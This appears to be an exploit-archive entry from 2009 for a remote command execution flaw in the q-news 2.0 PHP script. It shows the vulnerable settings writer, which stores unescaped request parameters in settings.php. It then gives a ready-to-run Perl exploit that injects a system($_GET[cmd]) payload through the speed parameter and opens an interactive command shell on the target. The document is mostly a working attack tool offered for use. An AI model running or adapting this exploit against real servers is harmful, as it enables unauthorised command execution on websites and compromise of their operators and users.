[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : q-news 2.0 Remote Command Execution Exploit
# Published : 2009-02-10
# Author : Fireshot
# Previous Title : Papoo CMS 3.x (pfadhier) Local File Inclusion Vulnerability
# Next Title : Potato News 1.0.0 (user) Local File Inclusion Vulnerability


##########################################################################

Author = FireShot , Jacopo Vuga.
Mail = fireshot<at>autistici<dot>org

Vulnerability = Remote Command Execution
Software = q-news 2.0
Download =
http://ovh.dl.sourceforge.net/sourceforge/php-box/2.0_nologin.zip

Greets to = Osirys for his friendship and his tips, Myral, str0ke

###########################################################################

[CODE]

<?php
$filename = 'settings.php';
if (is_writable($filename)) {
    if (!$handle = fopen($filename, 'w')) {
         print "Cannot open file ($filename)";
         exit;
    }
if (!fwrite($handle, "<?php
  $password = '$password';
  $font = '$font';
  $height = '$height';
  $width = '$width';
  $direction = '$direction';
  $speed = '$speed';
  $bgcolor = '$bgcolor';
  $txtcolor = '$txtcolor';
  $txtsize = '$txtsize';
  ?>")) {
        print "Cannot write to file ($filename)";
        exit;
    }
    print "Successfully saved settings to file ($filename)";
    fclose($handle);
                    
} else {
    print "The file $filename is not writable";
}
?>

[/CODE]


[EXPLOIT]

#!/usr/bin/perl


use HTTP::Request;
use LWP::UserAgent;

my $host  =  $ARGV[0];
my $vuln  =  "/wsettings.php?speed=";
my $rce   =  "/settings.php?cmd=";
my $evil  =  "';system($_GET[cmd]);$x = '";

my $inj_url = $host.$vuln.$evil;
my $rce_url = $host.$rce;

($host) || die " usage= perl $0 site n"; 

print "------------------------n";
print "   Q-News RCE Exploit   n";
print "       by FireShot      n";
print "------------------------nn";

$response = get($inj_url);
if ($response =~ /Successfully saved settings/) {
    &shell;
}
else {
    print "error n";
    exit(0);
}

sub shell {
    print "FireShot-shell: ";
    my $cmd = <STDIN>;
    $cmd !~ /quit/ || die " exit n";
    my $url = $rce_url.$cmd;
    my $re = get($url);
    if ($re =~ /(.)/) {
        print $re;
    }
    else {
        print "command unknow n";
    }
    &shell;
}

sub get() {
    my $url = $_[0];
    my $req = HTTP::Request->new(GET => $url);
    my $agent  = LWP::UserAgent->new();
    $agent->timeout(4);
    my $response = $agent->request($req);
    return $response->content;
}

[/EXPLOIT]

############################################################################

# www.Syue.com [2009-02-10]